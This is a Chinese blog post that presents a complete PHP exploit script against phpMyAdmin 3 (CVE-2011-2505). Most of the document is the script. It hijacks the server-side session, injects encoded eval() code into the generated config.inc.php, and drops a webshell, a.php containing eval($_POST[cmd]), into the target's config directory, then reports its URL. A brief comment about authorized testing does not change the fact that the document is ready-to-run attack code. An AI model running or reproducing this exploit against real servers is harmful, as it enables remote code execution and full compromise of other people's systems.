
phpMyAdmin 3 remote code execution exploit(PHP 版)

发表于 2013-2-21 09:13:03
最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpMyAdmin3漏洞的讨论。虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了;据黑哥说有不那么鸡肋的利用方法,于是夜里翻出代码研究了一番,写出了这个冷饭exp。由于我动手得晚,之前已经很多人研究并写过exp了,所以这个属于炒冷饭,权当研究研究打发时间。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是需要 session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问;
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。反过来说,安装完成后删除 config 目录或将其设为不可写,这条利用链就走不通。

在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
<?php
/**
 * pma3 - phpMyAdmin3 remote code execution exploit (PHP port), by oldjun.
 *
 * Chain, as implemented below: plant a crafted ConfigFile entry in the
 * server-side session (the session-manipulation issue the banner names,
 * CVE-2011-2505), have setup/config.php save it to config/config.inc.php,
 * then fetch that file so the injected code drops config/a.php.
 *
 * Only works while the target's config/ directory exists and is writable.
 * It writes files on the target: run it only against systems you are
 * authorized to test, and remove config/config.inc.php and config/a.php
 * afterwards.
 *
 * The banner below is printed on every run, byte-identical to the original
 * print_r() text (a nowdoc needs no escaping of the apostrophe).
 */
echo <<<'BANNER'

+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken's ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+

BANNER;

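/**
 * Argument handling.
 *
 * Usage: php <script> host path
 *   host  target server (ip/hostname); used verbatim in the Host header and
 *         for the TCP connection (port 80, plain HTTP only)
 *   path  URL path of the phpMyAdmin 3 root on that server, e.g. /pma/
 *
 * The exploit only works when the directory "config" exists and is writable
 * on the target. A usage error now exits non-zero instead of 0.
 */
if ($argc < 3) {
    echo <<<USAGE

+---------------------------------------------------------------------------+
Usage: php {$argv[0]} host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php {$argv[0]} localhost /pma/
+---------------------------------------------------------------------------+

USAGE;
    exit(1);
}

$host = $argv[1];

// Every request target is built as $path . <relative url> (see php_request),
// so the path must start and end with "/": "/pma" would otherwise become
// "/pmaconfig/". "/pma/" is left unchanged; "pma" and "/pma" are normalised.
$path = '/' . trim($argv[2], '/');
if ($path !== '/') {
    $path .= '/';
}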

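/**
 * Step 1: probe config/ on the target.
 *
 * The exploit needs that directory to exist (writability cannot be checked
 * from here); a 404 for it is treated as "directory missing" and aborts.
 *
 * The original searched the whole raw response for the substring "404",
 * so any page body that merely mentions 404 (or a 403 listing page) was
 * misread. Only the status line is inspected now. Any other status — 403
 * for a directory with listing disabled, 200, a redirect — still counts as
 * "exists"; that matches the original's optimistic behaviour.
 */
echo "[+] Try to determine if the directory:config exists....\n";
$probe = php_request('config/');
if (preg_match('#^HTTP/1\.[01] 404\b#', $probe) === 1) {
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}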
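/**
 * Step 2: obtain a session id and a token from the login page.
 *
 * The session id is captured from the Set-Cookie header (phpMyAdmin=<id>;),
 * the token from the first "token=<32 word chars>&" that follows it in the
 * page; both are required by the later requests.
 *
 * Fixes: the match result is checked before the capture groups are read
 * (the original indexed $resp[3] unconditionally), and the two echo lines
 * now actually print the captured values instead of the literal text
 * "tokentoken" / "Session IDsessionid".
 */
echo "[+] Try to get token and sessionid....\n";
$loginPage = php_request('index.php');
$captures = array();
$matched = preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $loginPage, $captures);
if ($matched !== 1) {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}
$sessionid = $captures[1];
$token = $captures[3];
echo "[+] token: $token\n";
echo "[+] Session ID: $sessionid\n";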

/**
 * Step 3: plant the payload in the server-side session.
 *
 * The GET abuses the session_to_unset / _SESSION[...] request parameters
 * (the session-manipulation issue named in the banner, CVE-2011-2505) to
 * store a ConfigFile entry whose *array key* is "*​/eval(...);/​*". Its
 * leading "*​/" and trailing "/​*" indicate that, when setup/config.php later
 * writes the session's ConfigFile out as config/config.inc.php, the key lands
 * in a comment context: it closes that comment, injects an eval() and re-opens
 * a comment so the remainder of the generated line stays inert. (Inferred from
 * the payload shape; the generator itself is not shown here.)
 *
 * The eval'd code is written below in plain text and then expressed as the
 * same chr().chr()... chain the original hard-coded, so no quote character
 * has to survive the trip through the URL. It drops a one-line
 * eval($_POST[cmd]) shell as a.php and echoes the marker 't00ls' that the
 * final step looks for. db_create.php is only the carrier; per the original
 * author's note, almost any PHP file in the pma3 root works the same way.
 *
 * The query string is sent exactly as built — no percent-encoding — just as
 * the original did.
 */
echo "[+] Try to insert shell into session....\n";

$dropper = "fputs(fopen('a.php','w'),'<?php eval(\$_POST[cmd])?>');echo('t00ls');";
$chrCalls = array();
foreach (str_split($dropper) as $byte) {
    $chrCalls[] = 'chr(' . ord($byte) . ')';
}
$injectedKey = '*/eval(' . implode('.', $chrCalls) . ');/*';

$plantUrl = 'db_create.php?token=' . $token
    . '&session_to_unset=t00ls'
    . '&_SESSION[ConfigFile][Servers][' . $injectedKey . '][host]=t00ls.net';
php_request($plantUrl, '', 'phpMyAdmin=' . $sessionid);
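/**
 * Step 4: make setup/config.php save the session's ConfigFile (planted in
 * step 3) to config/config.inc.php, then fetch that file directly so the
 * injected code runs: it writes a.php next to it (hence config/a.php, which
 * the success message prints) and echoes the marker 't00ls'.
 *
 * Fixes: the marker test compares strpos() against false explicitly instead
 * of relying on truthiness, and the success message's typo is corrected.
 *
 * After an authorized test the target is left with two artifacts that must
 * be cleaned up: the rewritten config/config.inc.php and config/a.php.
 */
echo "[+] Try to create webshell....\n";
$savePost = 'phpMyAdmin=' . $sessionid
    . '&tab_hash=&token=' . $token
    . '&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save';
php_request('setup/config.php', $savePost, 'phpMyAdmin=' . $sessionid);

echo "[+] Try to check if the webshell was created successfully....\n";
$written = php_request('config/config.inc.php');
if (strpos($written, 't00ls') !== false) {
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}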

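/**
 * Send one raw HTTP/1.1 request to the target and return the complete raw
 * response (status line, headers and body, unparsed).
 *
 * @param string $url    Path relative to the pma3 root ($path), optionally
 *                       with a query string; sent verbatim, not percent-encoded.
 * @param string $data   URL-encoded POST body. '' (the default) sends a GET.
 * @param string $cookie Raw Cookie header value. '' (the default) sends none.
 * @return string        Raw response bytes; '' if the server sent nothing.
 *
 * Reads the target from the globals $host and $path, as the original did, so
 * existing call sites keep working. Dies with a message when the TCP
 * connection cannot be opened.
 *
 * Fixes over the original: the connect failure now reports errno/errstr
 * (gethostbyname() returned its input unchanged on DNS failure, hiding the
 * real cause), a connect and read timeout are set so a silent server cannot
 * hang the tool forever, and the socket is closed after reading.
 */
function php_request($url, $data = '', $cookie = '')
{
    global $host, $path;

    $packet = build_http_request($host, $path . $url, $data, $cookie);

    $errno = 0;
    $errstr = '';
    $fp = fsockopen($host, 80, $errno, $errstr, 10);
    if (!$fp) {
        die("No response from $host: [$errno] $errstr\n");
    }
    stream_set_timeout($fp, 30);
    fwrite($fp, $packet);

    $resp = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 8192);
        if ($chunk === false) {
            break;
        }
        $resp .= $chunk;
        $meta = stream_get_meta_data($fp);
        if ($meta['timed_out']) {
            break;  // give up rather than spin on a server that stops talking
        }
    }
    fclose($fp);

    return $resp;
}

/**
 * Build the raw HTTP/1.1 request text for a single GET or POST.
 *
 * @param string $host   Value of the Host header.
 * @param string $target Request-target (path plus optional query), used as-is.
 * @param string $data   POST body; '' means GET with no body.
 * @param string $cookie Cookie header value; '' omits the header.
 * @return string        Request line, headers, blank line and body.
 */
function build_http_request($host, $target, $data = '', $cookie = '')
{
    $isPost = ($data !== '');

    $lines = array(
        ($isPost ? 'POST' : 'GET') . ' ' . $target . ' HTTP/1.1',
        'Accept: */*',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
        'Host: ' . $host,
    );
    if ($isPost) {
        $lines[] = 'Content-Type: application/x-www-form-urlencoded';
        $lines[] = 'Content-Length: ' . strlen($data);  // byte length, as HTTP requires
    }
    if ($cookie !== '') {
        $lines[] = 'Cookie: ' . $cookie;
    }
    $lines[] = 'Connection: Close';

    return implode("\r\n", $lines) . "\r\n\r\n" . $data;
}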